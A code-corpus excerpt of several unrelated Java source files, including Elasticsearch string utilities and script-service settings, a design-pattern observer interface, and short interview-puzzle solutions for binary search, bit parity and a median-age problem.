* @see #tokenizeToStringArray
*/
public static String[] delimitedListToStringArray(String str, String delimiter) {
return delimitedListToStringArray(str, delimiter, null);
}
/**
* Take a String which is a delimited list and convert it to a String array.
* <p>A single delimiter can consists of more than one character: It will still
* be considered as single delimiter string, rather than as bunch of potential
* delimiter characters - in contrast to <code>tokenizeToStringArray</code>.
*
* @param str the input String
* @param delimiter the delimiter between elements (this is a single delimiter,
* rather than a bunch individual delimiter characters)
* @param charsToDelete a set of characters to delete. Useful for deleting unwanted
* line breaks: e.g. "\r\n\f" will delete all new lines and line feeds in a String.
* @return an array of the tokens in the list
* @see #tokenizeToStringArray
*/
public static String[] delimitedListToStringArray(String str, String delimiter, String charsToDelete) {
if (str == null) {
return EMPTY_ARRAY;
}
if (delimiter == null) {
return new String[] { str };
}
List<String> result;
if (delimiter.isEmpty()) {
// split on every character
result = new ArrayList<>(str.length());
if (charsToDelete == null) {
charsToDelete = "";
}
for (int i = 0; i < str.length(); i++) {
if (charsToDelete.indexOf(str.charAt(i)) == -1) {
result.add(Character.toString(str.charAt(i)));
} else {
result.add("");
}
}
} else {
result = new ArrayList<>();
int pos = 0;
int delPos;
while ((delPos = str.indexOf(delimiter, pos)) != -1) {
result.add(deleteAny(str.subSequence(pos, delPos), charsToDelete).toString());
pos = delPos + delimiter.length();
}
if (str.length() > 0 && pos <= str.length()) {
// Add rest of String, but not in case of empty input.
result.add(deleteAny(str.subSequence(pos, str.length()), charsToDelete).toString());
}
}
return toStringArray(result);
}
/**
* Convert a CSV list into an array of Strings.
*
* @param str the input String
* @return an array of Strings, or the empty array in case of empty input
*/
public static String[] commaDelimitedListToStringArray(String str) {
return delimitedListToStringArray(str, ",");
}
/**
* Convenience method to convert a CSV string list to a set.
* Note that this will suppress duplicates.
*
* @param str the input String
* @return a Set of String entries in the list
*/
public static Set<String> commaDelimitedListToSet(String str) {
String[] tokens = commaDelimitedListToStringArray(str);
return new TreeSet<>(Arrays.asList(tokens));
}
/**
* Convenience method to return a Collection as a delimited (e.g. CSV)
* String. E.g. useful for <code>toString()</code> implementations.
*
* @param coll the Collection to display
* @param delim the delimiter to use (probably a ",")
* @param prefix the String to start each element with
* @param suffix the String to end each element with
* @return the delimited String
*/
public static String collectionToDelimitedString(Iterable<?> coll, String delim, String prefix, String suffix) {
StringBuilder sb = new StringBuilder();
collectionToDelimitedString(coll, delim, prefix, suffix, sb);
return sb.toString();
}
public static void collectionToDelimitedString(Iterable<?> coll, String delim, String prefix, String suffix, StringBuilder sb) {
Iterator<?> it = coll.iterator();
while (it.hasNext()) {
sb.append(prefix).append(it.next()).append(suffix);
if (it.hasNext()) {
sb.append(delim);
}
}
}
/**
* Converts a collection of items to a string like {@link #collectionToDelimitedString(Iterable, String, String, String, StringBuilder)}
* except that it stops if the string gets too long and just indicates how many items were omitted.
*
* @param coll the collection of items to display
* @param delim the delimiter to write between the items (usually {@code ","})
* @param prefix a string to write before each item (usually {@code ""} or {@code "["})
* @param suffix a string to write after each item (usually {@code ""} or {@code "]"})
* @param appendLimit if this many characters have been appended to the string and there are still items to display then the remaining
* items are omitted
*/
public static void collectionToDelimitedStringWithLimit(
Iterable<?> coll,
String delim,
String prefix,
String suffix,
int appendLimit,
StringBuilder sb
) {
final Iterator<?> it = coll.iterator();
final long lengthLimit = sb.length() + appendLimit; // long to avoid overflow
int count = 0;
while (it.hasNext()) {
sb.append(prefix).append(it.next()).append(suffix);
count += 1;
if (it.hasNext()) {
sb.append(delim);
if (sb.length() > lengthLimit) {
int omitted = 0;
while (it.hasNext()) {
it.next();
omitted += 1;
}
sb.append("... (").append(count + omitted).append(" in total, ").append(omitted).append(" omitted)");
}
}
}
}
/**
* Convenience method to return a Collection as a delimited (e.g. CSV)
* String. E.g. useful for <code>toString()</code> implementations.
*
* @param coll the Collection to display
* @param delim the delimiter to use (probably a ",")
* @return the delimited String
*/
public static String collectionToDelimitedString(Iterable<?> coll, String delim) {
return collectionToDelimitedString(coll, delim, "", "");
}
/**
* Convenience method to return a Collection as a CSV String.
* E.g. useful for <code>toString()</code> implementations.
*
* @param coll the Collection to display
* @return the delimited String
*/
public static String collectionToCommaDelimitedString(Iterable<?> coll) {
return collectionToDelimitedString(coll, ",");
}
/**
* Convenience method to return a String array as a delimited (e.g. CSV)
* String. E.g. useful for <code>toString()</code> implementations.
*
* @param arr the array to display
* @param delim the delimiter to use (probably a ",")
* @return the delimited String
*/
public static String arrayToDelimitedString(Object[] arr, String delim) {
StringBuilder sb = new StringBuilder();
arrayToDelimitedString(arr, delim, sb);
return sb.toString();
}
public static void arrayToDelimitedString(Object[] arr, String delim, StringBuilder sb) {
if (isEmpty(arr)) {
return;
}
for (int i = 0; i < arr.length; i++) {
if (i > 0) {
sb.append(delim);
}
sb.append(arr[i]);
}
}
/**
* Convenience method to return a String array as a CSV String.
* E.g. useful for <code>toString()</code> implementations.
*
* @param arr the array to display
* @return the delimited String
*/
public static String arrayToCommaDelimitedString(Object[] arr) {
return arrayToDelimitedString(arr, ",");
}
/**
* Format the double value with a single decimal points, trimming trailing '.0'.
*/
public static String format1Decimals(double value, String suffix) {
String p = String.valueOf(value);
int ix = p.indexOf('.') + 1;
int ex = p.indexOf('E');
char fraction = p.charAt(ix);
if (fraction == '0') {
if (ex != -1) {
return p.substring(0, ix - 1) + p.substring(ex) + suffix;
} else {
return p.substring(0, ix - 1) + suffix;
}
} else {
if (ex != -1) {
return p.substring(0, ix) + fraction + p.substring(ex) + suffix;
} else {
return p.substring(0, ix) + fraction + suffix;
}
}
}
/**
* Determine whether the given array is empty:
* i.e. <code>null</code> or of zero length.
*
* @param array the array to check
*/
private static boolean isEmpty(Object[] array) {
return (array == null || array.length == 0);
}
private Strings() {}
public static byte[] toUTF8Bytes(CharSequence charSequence) {
return toUTF8Bytes(charSequence, new BytesRefBuilder());
}
public static byte[] toUTF8Bytes(CharSequence charSequence, BytesRefBuilder spare) {
spare.copyChars(charSequence);
return Arrays.copyOf(spare.bytes(), spare.length());
}
/**
* Return substring(beginIndex, endIndex) that is impervious to string length.
*/
public static String substring(String s, int beginIndex, int endIndex) {
if (s == null) {
return s;
}
int realEndIndex = s.length() > 0 ? s.length() - 1 : 0;
if (endIndex > realEndIndex) {
return s.substring(beginIndex);
} else {
return s.substring(beginIndex, endIndex);
}
}
/**
* If an array only consists of zero or one element, which is "*" or "_all" return an empty array
* which is usually used as everything
*/
public static boolean isAllOrWildcard(String[] data) {
return CollectionUtils.isEmpty(data) || data.length == 1 && isAllOrWildcard(data[0]);
}
/**
* Returns `true` if the string is `_all` or `*`.
*/
public static boolean isAllOrWildcard(String data) {
return "_all".equals(data) || "*".equals(data);
}
/**
* Return a {@link String} that is the json representation of the provided {@link ToXContent}.
* Wraps the output into an anonymous object if needed. The content is not pretty-printed
* nor human readable.
*/
public static String toString(ToXContent toXContent) {
return toString(toXContent, false, false);
}
/**
* Return a {@link String} that is the json representation of the provided {@link ChunkedToXContent}.
* @deprecated don't add usages of this method, it will be removed eventually
* TODO: remove this method, it makes no sense to turn potentially very large chunked xcontent instances into a string
*/
@Deprecated
public static String toString(ChunkedToXContent chunkedToXContent) {
return toString(chunkedToXContent, false, false);
}
/**
* Return a {@link String} that is the json representation of the provided {@link ToXContent}.
* Wraps the output into an anonymous object if needed.
* Allows to configure the params.
* The content is not pretty-printed nor human readable.
*/
public static String toString(ToXContent toXContent, ToXContent.Params params) {
return toString(toXContent, params, false, false);
}
/**
* Returns a string representation of the builder (only applicable for text based xcontent).
* @param xContentBuilder builder containing an object to converted to a string
*/
public static String toString(XContentBuilder xContentBuilder) {
return BytesReference.bytes(xContentBuilder).utf8ToString();
}
/**
* Return a {@link String} that is the json representation of the provided {@link ToXContent}.
* Wraps the output into an anonymous object if needed. Allows to control whether the outputted
* json needs to be pretty printed and human readable.
*
*/
public static String toString(ToXContent toXContent, boolean pretty, boolean human) {
return toString(toXContent, ToXContent.EMPTY_PARAMS, pretty, human);
}
/**
* Return a {@link String} that is the json representation of the provided {@link ChunkedToXContent}.
* Allows to control whether the outputted json needs to be pretty printed and human readable.
* @deprecated don't add usages of this method, it will be removed eventually
* TODO: remove this method, it makes no sense to turn potentially very large chunked xcontent instances into a string
*/
@Deprecated
public static String toString(ChunkedToXContent chunkedToXContent, boolean pretty, boolean human) {
return toString(ChunkedToXContent.wrapAsToXContent(chunkedToXContent), pretty, human);
}
/**
* Return a {@link String} that is the json representation of the provided {@link ToXContent}.
* Wraps the output into an anonymous object if needed.
* Allows to configure the params.
* Allows to control whether the outputted json needs to be pretty printed and human readable.
*/
private static String toString(ToXContent toXContent, ToXContent.Params params, boolean pretty, boolean human) {
try {
XContentBuilder builder = createBuilder(pretty, human);
if (toXContent.isFragment()) {
builder.startObject();
}
toXContent.toXContent(builder, params);
if (toXContent.isFragment()) {
builder.endObject();
}
return toString(builder);
} catch (IOException e) {
try {
XContentBuilder builder = createBuilder(pretty, human);
builder.startObject();
builder.field("error", "error building toString out of XContent: " + e.getMessage());
builder.field("stack_trace", ExceptionsHelper.stackTrace(e));
builder.endObject();
return toString(builder);
} catch (IOException e2) {
throw new ElasticsearchException("cannot generate error message for deserialization", e);
}
}
}
private static XContentBuilder createBuilder(boolean pretty, boolean human) throws IOException {
XContentBuilder builder = JsonXContent.contentBuilder();
if (pretty) {
builder.prettyPrint();
}
if (human) {
builder.humanReadable(true);
}
return builder;
}
/**
* Truncates string to a length less than length. Backtracks to throw out
* high surrogates.
*/
public static String cleanTruncate(String s, int length) {
if (s == null) {
return s;
}
/*
* Its pretty silly for you to truncate to 0 length but just in case
* someone does this shouldn't break.
*/
if (length == 0) {
return "";
}
if (length >= s.length()) {
return s;
}
if (Character.isHighSurrogate(s.charAt(length - 1))) {
length--;
}
return s.substring(0, length);
}
/**
* Checks that the supplied string is neither null nor empty, per {@link #isNullOrEmpty(String)}.
* If this check fails, then an {@link IllegalArgumentException} is thrown with the supplied message.
*
* @param str the <code>String</code> to check
* @param message the exception message to use if {@code str} is null or empty
* @return the supplied {@code str}
*/
public static String requireNonEmpty(String str, String message) {
if (isNullOrEmpty(str)) {
throw new IllegalArgumentException(message);
}
return str;
}
/**
* Checks that the supplied string is neither null nor blank, per {@link #isNullOrBlank(String)}.
* If this check fails, then an {@link IllegalArgumentException} is thrown with the supplied message.
*
* @param str the <code>String</code> to check
* @param message the exception message to use if {@code str} is null or blank
* @return the supplied {@code str}
*/
public static String requireNonBlank(String str, String message) {
if (isNullOrBlank(str)) {
throw new IllegalArgumentException(message);
}
return str;
}
public static boolean isNullOrEmpty(@Nullable String s) {
return s == null || s.isEmpty();
}
public static boolean isNullOrBlank(@Nullable String s) {
return s == null || s.isBlank();
}
public static String padStart(String s, int minimumLength, char c) {
Objects.requireNonNull(s, "s");
if (s.length() >= minimumLength) {
return s;
} else {
return Character.toString(c).repeat(minimumLength - s.length()) + s;
}
}
public static String toLowercaseAscii(String in) {
return in.codePoints()
.map(cp -> cp <= 128 ? Character.toLowerCase(cp) : cp)
.collect(StringBuilder::new, StringBuilder::appendCodePoint, StringBuilder::append)
.toString();
}
/**
* Alias for {@link org.elasticsearch.core.Strings#format}
*/
public static String format(String format, Object... args) {
return org.elasticsearch.core.Strings.format(format, args);
}
public static String stripDisallowedChars(String string) {
return INVALID_FILENAME_CHARS_REGEX.matcher(string).replaceAll("");
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/common/Strings.java |
1,142 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.observer;
/**
* Observer interface.
*/
public interface WeatherObserver {
void update(WeatherType currentWeather);
}
| smedals/java-design-patterns | observer/src/main/java/com/iluwatar/observer/WeatherObserver.java |
1,143 | // We are playing the Guess Game. The game is as follows:
// I pick a number from 1 to n. You have to guess which number I picked.
// Every time you guess wrong, I'll tell you whether the number is higher or lower.
// You call a pre-defined API guess(int num) which returns 3 possible results (-1, 1, or 0):
// -1 : My number is lower
// 1 : My number is higher
// 0 : Congrats! You got it!
// Example:
// n = 10, I pick 6.
// Return 6.
/* The guess API is defined in the parent class GuessGame.
@param num, your guess
@return -1 if my number is lower, 1 if my number is higher, otherwise return 0
int guess(int num); */
public class GuessNumberHigherOrLower extends GuessGame {
public int guessNumber(int n) {
int left = 1;
int right = n;
while(left <= right) {
int mid = left + (right - left) / 2;
if(guess(mid) == 0) {
return mid;
} else if(guess(mid) > 0) {
left = mid + 1;
} else {
right = mid;
}
}
return -1;
}
}
| kdn251/interviews | company/google/GuessNumberHigherOrLower.java |
1,144 | /**
* We define the parity of an integer n as the sum of the bits in binary representation computed modulo
* two. As an example, the number 21 = 101012 has three 1s in its binary representation so it has parity
* 3(mod2), or 1.
* In this problem you have to calculate the parity of an integer 1 ≤ I ≤ 2147483647.
* Input
* Each line of the input has an integer I and the end of the input is indicated by a line where I = 0 that
* should not be processed.
* Output
* For each integer I in the inputt you should print a line ‘The parity of B is P (mod 2).’, where B
* is the binary representation of I.
* Sample Input
* 1
* 2
* 10
* 21
* 0
* Sample Output
* The parity of 1 is 1 (mod 2).
* The parity of 10 is 1 (mod 2).
* The parity of 1010 is 2 (mod 2).
* The parity of 10101 is 3 (mod 2).
*/
//https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=1872
import java.util.Scanner;
public class Parity {
public static void main(String[] args) {
while (true) {
Scanner input = new Scanner(System.in);
int number = input.nextInt();
if (number == 0) {
break;
}
String binaryInString = convertToBinary(number);
int count = 0;
for (int i = 0; i < binaryInString.length(); i++) {
if ("1".equals(binaryInString.charAt(i) + "")) {
count++;
}
}
System.out.println("The parity of " + binaryInString + " is "
+ count + " (mod 2).");
}
}
private static String convertToBinary(int number) {
StringBuilder s = new StringBuilder("");
while (number != 0) {
s = s.append(number % 2);
number = number / 2;
}
return s.reverse().toString();
}
}
| kdn251/interviews | uva/Parity.java |
1,147 | /**
* There is a village in Bangladesh, where brick game is very popular. Brick game is a team game. Each
* team consists of odd number of players. Number of players must be greater than 1 but cannot be
* greater than 10. Age of each player must be within 11 and 20. No two players can have the same age.
* There is a captain for each team. The communication gap between two players depends on their age
* difference, i.e. the communication gap is larger if the age difference is larger. Hence they select the
* captain of a team in such a way so that the number of players in the team who are younger than that
* captain is equal to the number of players who are older than that captain.
* Ages of all members of the team are provided. You have to determine the age of the captain.
* Input
* Input starts with an integer T (T ≤ 100), the number of test cases.
* Each of the next T lines will start with an integer N (1 < N < 11), number of team members
* followed by N space separated integers representing ages of all of the members of a team. Each of these
* N integers will be between 11 and 20 (inclusive). Note that, ages will be given in strictly increasing
* order or strictly decreasing order. We will not mention which one is increasing and which one is
* decreasing, you have to be careful enough to handle both situations.
* Output
* For each test case, output one line in the format ‘Case x: a’ (quotes for clarity), where x is the case
* number and a is the age of the captain.
* Sample Input
* 2
* 5 19 17 16 14 12
* 5 12 14 16 17 18
* Sample Output
* Case 1: 16
* Case 2: 16
*/
//https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=2986
import static java.lang.Integer.parseInt;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Scanner;
public class BrickGame {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
int numberOfTestCases = input.nextInt();
int caseNum = 1;
while (numberOfTestCases != 0) {
String[] numbersString = input.nextLine().split(" ");
int numberOfMembers = parseInt(numbersString[0]);
List<Integer> numbers = new ArrayList<Integer>();
for (int i = 0; i < numberOfMembers + 1; i++) {
numbers.add(parseInt(numbersString[i]));
}
Collections.sort(numbers);
System.out.print("Case "
+ caseNum
+ ": "
+ numbers.subList(1, numbers.size()).get(
numberOfMembers / 2) + "\n");
numberOfTestCases--;
caseNum++;
}
}
}
| kdn251/interviews | uva/BrickGame.java |
1,155 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.script;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.elasticsearch.ResourceNotFoundException;
import org.elasticsearch.action.ActionListener;
import org.elasticsearch.action.admin.cluster.storedscripts.DeleteStoredScriptRequest;
import org.elasticsearch.action.admin.cluster.storedscripts.GetStoredScriptRequest;
import org.elasticsearch.action.admin.cluster.storedscripts.PutStoredScriptRequest;
import org.elasticsearch.action.support.master.AcknowledgedResponse;
import org.elasticsearch.cluster.AckedClusterStateUpdateTask;
import org.elasticsearch.cluster.ClusterChangedEvent;
import org.elasticsearch.cluster.ClusterState;
import org.elasticsearch.cluster.ClusterStateApplier;
import org.elasticsearch.cluster.ClusterStateUpdateTask;
import org.elasticsearch.cluster.metadata.Metadata;
import org.elasticsearch.cluster.service.ClusterService;
import org.elasticsearch.common.Strings;
import org.elasticsearch.common.logging.DeprecationCategory;
import org.elasticsearch.common.logging.DeprecationLogger;
import org.elasticsearch.common.settings.ClusterSettings;
import org.elasticsearch.common.settings.Setting;
import org.elasticsearch.common.settings.Setting.Property;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.common.util.Maps;
import org.elasticsearch.common.util.set.Sets;
import org.elasticsearch.core.IOUtils;
import org.elasticsearch.core.SuppressForbidden;
import org.elasticsearch.core.TimeValue;
import java.io.Closeable;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.Comparator;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.Set;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.LongSupplier;
import java.util.stream.Collectors;
public class ScriptService implements Closeable, ClusterStateApplier, ScriptCompiler {
private static final Logger logger = LogManager.getLogger(ScriptService.class);
private static final DeprecationLogger deprecationLogger = DeprecationLogger.getLogger(ScriptService.class);
static final String DISABLE_DYNAMIC_SCRIPTING_SETTING = "script.disable_dynamic";
// Special setting value for SCRIPT_GENERAL_MAX_COMPILATIONS_RATE to indicate the script service should use context
// specific caches
static final ScriptCache.CompilationRate USE_CONTEXT_RATE_VALUE = new ScriptCache.CompilationRate(-1, TimeValue.MINUS_ONE);
static final String USE_CONTEXT_RATE_KEY = "use-context";
public static final Setting<Integer> SCRIPT_GENERAL_CACHE_SIZE_SETTING = Setting.intSetting(
"script.cache.max_size",
3000,
0,
Property.Dynamic,
Property.NodeScope
);
public static final Setting<TimeValue> SCRIPT_GENERAL_CACHE_EXPIRE_SETTING = Setting.positiveTimeSetting(
"script.cache.expire",
TimeValue.timeValueMillis(0),
Property.Dynamic,
Property.NodeScope
);
public static final Setting<Integer> SCRIPT_MAX_SIZE_IN_BYTES = Setting.intSetting(
"script.max_size_in_bytes",
65535,
0,
Property.Dynamic,
Property.NodeScope
);
public static final Setting<ScriptCache.CompilationRate> SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING = new Setting<>(
"script.max_compilations_rate",
"150/5m",
(String value) -> value.equals(USE_CONTEXT_RATE_KEY) ? USE_CONTEXT_RATE_VALUE : new ScriptCache.CompilationRate(value),
Property.Dynamic,
Property.NodeScope
);
public static final String USE_CONTEXT_RATE_KEY_DEPRECATION_MESSAGE = "["
+ USE_CONTEXT_RATE_KEY
+ "] is deprecated for the setting ["
+ SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "] as system scripts are now exempt from the rate limit. "
+ "Set to a value such as [150/5m] (a rate of 150 compilations per five minutes) to rate limit user scripts in case the "
+ "script cache ["
+ SCRIPT_GENERAL_CACHE_SIZE_SETTING.getKey()
+ "] is undersized causing script compilation thrashing.";
// Per-context settings
static final String CONTEXT_PREFIX = "script.context.";
// script.context.<context-name>.{cache_max_size, cache_expire, max_compilations_rate}
public static final Setting.AffixSetting<Integer> SCRIPT_CACHE_SIZE_SETTING = Setting.affixKeySetting(
CONTEXT_PREFIX,
"cache_max_size",
key -> Setting.intSetting(
key,
SCRIPT_GENERAL_CACHE_SIZE_SETTING,
0,
Property.NodeScope,
Property.Dynamic,
Property.DeprecatedWarning
)
);
public static final Setting.AffixSetting<TimeValue> SCRIPT_CACHE_EXPIRE_SETTING = Setting.affixKeySetting(
CONTEXT_PREFIX,
"cache_expire",
key -> Setting.positiveTimeSetting(
key,
SCRIPT_GENERAL_CACHE_EXPIRE_SETTING,
TimeValue.timeValueMillis(0),
Property.NodeScope,
Property.Dynamic,
Property.DeprecatedWarning
)
);
// Unlimited compilation rate for context-specific script caches
static final String UNLIMITED_COMPILATION_RATE_KEY = "unlimited";
public static final Setting.AffixSetting<ScriptCache.CompilationRate> SCRIPT_MAX_COMPILATIONS_RATE_SETTING = Setting.affixKeySetting(
CONTEXT_PREFIX,
"max_compilations_rate",
key -> new Setting<ScriptCache.CompilationRate>(
key,
"75/5m",
(String value) -> value.equals(UNLIMITED_COMPILATION_RATE_KEY)
? ScriptCache.UNLIMITED_COMPILATION_RATE
: new ScriptCache.CompilationRate(value),
Property.NodeScope,
Property.Dynamic,
Property.DeprecatedWarning
)
);
private static final ScriptCache.CompilationRate SCRIPT_COMPILATION_RATE_ZERO = new ScriptCache.CompilationRate(0, TimeValue.ZERO);
public static final Setting<Boolean> SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING = Setting.boolSetting(
"script.disable_max_compilations_rate",
false,
Property.NodeScope
);
public static final String ALLOW_NONE = "none";
public static final Setting<List<String>> TYPES_ALLOWED_SETTING = Setting.stringListSetting(
"script.allowed_types",
Setting.Property.NodeScope
);
public static final Setting<List<String>> CONTEXTS_ALLOWED_SETTING = Setting.stringListSetting(
"script.allowed_contexts",
Setting.Property.NodeScope
);
private final Set<String> typesAllowed;
private final Set<String> contextsAllowed;
private final Map<String, ScriptEngine> engines;
private final Map<String, ScriptContext<?>> contexts;
private final LongSupplier timeProvider;
private ClusterState clusterState;
private int maxSizeInBytes;
// package private for tests
final AtomicReference<CacheHolder> cacheHolder = new AtomicReference<>();
@SuppressWarnings("this-escape")
public ScriptService(
Settings settings,
Map<String, ScriptEngine> engines,
Map<String, ScriptContext<?>> contexts,
LongSupplier timeProvider
) {
this.engines = Collections.unmodifiableMap(Objects.requireNonNull(engines));
this.contexts = Collections.unmodifiableMap(Objects.requireNonNull(contexts));
if (Strings.hasLength(settings.get(DISABLE_DYNAMIC_SCRIPTING_SETTING))) {
throw new IllegalArgumentException(
DISABLE_DYNAMIC_SCRIPTING_SETTING
+ " is not a supported setting, replace with "
+ "fine-grained script settings. \n Dynamic scripts can be enabled for all languages and all operations not "
+ "using `script.disable_dynamic: false` in elasticsearch.yml"
);
}
this.typesAllowed = TYPES_ALLOWED_SETTING.exists(settings) ? new HashSet<>() : null;
if (this.typesAllowed != null) {
List<String> typesAllowedList = TYPES_ALLOWED_SETTING.get(settings);
if (typesAllowedList.isEmpty()) {
throw new IllegalArgumentException(
"must specify at least one script type or none for setting [" + TYPES_ALLOWED_SETTING.getKey() + "]."
);
}
for (String settingType : typesAllowedList) {
if (ALLOW_NONE.equals(settingType)) {
if (typesAllowedList.size() != 1) {
throw new IllegalArgumentException(
"cannot specify both ["
+ ALLOW_NONE
+ "]"
+ " and other script types for setting ["
+ TYPES_ALLOWED_SETTING.getKey()
+ "]."
);
} else {
break;
}
}
boolean found = false;
for (ScriptType scriptType : ScriptType.values()) {
if (scriptType.getName().equals(settingType)) {
found = true;
this.typesAllowed.add(settingType);
break;
}
}
if (found == false) {
throw new IllegalArgumentException(
"unknown script type [" + settingType + "] found in setting [" + TYPES_ALLOWED_SETTING.getKey() + "]."
);
}
}
}
this.contextsAllowed = CONTEXTS_ALLOWED_SETTING.exists(settings) ? new HashSet<>() : null;
if (this.contextsAllowed != null) {
List<String> contextsAllowedList = CONTEXTS_ALLOWED_SETTING.get(settings);
if (contextsAllowedList.isEmpty()) {
throw new IllegalArgumentException(
"must specify at least one script context or none for setting [" + CONTEXTS_ALLOWED_SETTING.getKey() + "]."
);
}
for (String settingContext : contextsAllowedList) {
if (ALLOW_NONE.equals(settingContext)) {
if (contextsAllowedList.size() != 1) {
throw new IllegalArgumentException(
"cannot specify both ["
+ ALLOW_NONE
+ "]"
+ " and other script contexts for setting ["
+ CONTEXTS_ALLOWED_SETTING.getKey()
+ "]."
);
} else {
break;
}
}
if (contexts.containsKey(settingContext)) {
this.contextsAllowed.add(settingContext);
} else {
throw new IllegalArgumentException(
"unknown script context [" + settingContext + "] found in setting [" + CONTEXTS_ALLOWED_SETTING.getKey() + "]."
);
}
}
}
this.setMaxSizeInBytes(SCRIPT_MAX_SIZE_IN_BYTES.get(settings));
this.timeProvider = timeProvider;
// Validation requires knowing which contexts exist.
this.validateCacheSettings(settings);
this.setCacheHolder(settings);
}
public static boolean isUseContextCacheSet(Settings settings) {
return SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.get(settings).equals(USE_CONTEXT_RATE_VALUE);
}
public static boolean isImplicitContextCacheSet(Settings settings) {
return new ScriptService.ContextSettings(settings).implicitContextCache();
}
public static String contextDeprecationMessage(Settings settings) {
return new ScriptService.ContextSettings(settings).deprecationMessage();
}
/**
* This is overridden in tests to disable compilation rate limiting.
*/
boolean compilationLimitsEnabled() {
return true;
}
void registerClusterSettingsListeners(ClusterSettings clusterSettings) {
clusterSettings.addSettingsUpdateConsumer(SCRIPT_MAX_SIZE_IN_BYTES, this::setMaxSizeInBytes);
// Handle all updatable per-context settings at once for each context.
for (ScriptContext<?> context : contexts.values()) {
clusterSettings.addSettingsUpdateConsumer(
(settings) -> cacheHolder.get().set(context.name, contextCache(settings, context)),
Arrays.asList(
SCRIPT_CACHE_SIZE_SETTING.getConcreteSettingForNamespace(context.name),
SCRIPT_CACHE_EXPIRE_SETTING.getConcreteSettingForNamespace(context.name),
SCRIPT_MAX_COMPILATIONS_RATE_SETTING.getConcreteSettingForNamespace(context.name),
SCRIPT_GENERAL_CACHE_EXPIRE_SETTING,
// general settings used for fallbacks
SCRIPT_GENERAL_CACHE_SIZE_SETTING
)
);
}
// Handle all settings for context and general caches, this flips between general and context caches.
clusterSettings.addSettingsUpdateConsumer(
this::setCacheHolder,
Arrays.asList(
SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING,
SCRIPT_GENERAL_CACHE_EXPIRE_SETTING,
SCRIPT_GENERAL_CACHE_SIZE_SETTING,
SCRIPT_MAX_COMPILATIONS_RATE_SETTING,
SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING,
SCRIPT_CACHE_EXPIRE_SETTING,
SCRIPT_CACHE_SIZE_SETTING
),
this::validateCacheSettings
);
}
/**
* Throw an IllegalArgumentException if any per-context setting does not match a context or if per-context settings are configured
* when using the general cache.
*/
void validateCacheSettings(Settings settings) {
ContextSettings contextSettings = new ContextSettings(settings, contexts.keySet());
if (contextSettings.useContextSet) {
deprecationLogger.warn(DeprecationCategory.SCRIPTING, "scripting-context-cache", USE_CONTEXT_RATE_KEY_DEPRECATION_MESSAGE);
} else if (contextSettings.hasContextSettings()) {
deprecationLogger.warn(DeprecationCategory.SCRIPTING, "scripting-context-cache", contextSettings.deprecationMessage());
}
if (contextSettings.incompatibleSettings()) {
throw new IllegalArgumentException(contextSettings.incompatibleSettingsMessage());
}
if (SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING.get(settings)) {
if (contextSettings.compilationContexts.size() > 0) {
throw new IllegalArgumentException(
"Cannot set custom context compilation rates ["
+ String.join(", ", contextSettings.contextCompilationKeys())
+ "] if compile rates disabled via ["
+ SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "]"
);
}
if (contextSettings.useContextSet == false && contextSettings.isGeneralCompilationRateSet) {
throw new IllegalArgumentException(
"Cannot set custom general compilation rates ["
+ SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "] to ["
+ SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.get(settings)
+ "] if compile rates disabled via ["
+ SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "]"
);
}
}
}
/**
* Collect settings related to script context and general caches.
*
* The general cache is used by default.
* The context cache is used if {@code script.max_compilations_rate} is {@code "use-context"}, a deprecated value.
* The context cache is used implicitly if {@code script.max_compilations_rate} is unset and any of the context
* cache family of settings is used:
* {@code script.context.*.max_compilations_rate}, {@link ScriptService#SCRIPT_MAX_COMPILATIONS_RATE_SETTING}
* {@code script.context.*.cache_max_size}, {@link ScriptService#SCRIPT_CACHE_SIZE_SETTING}
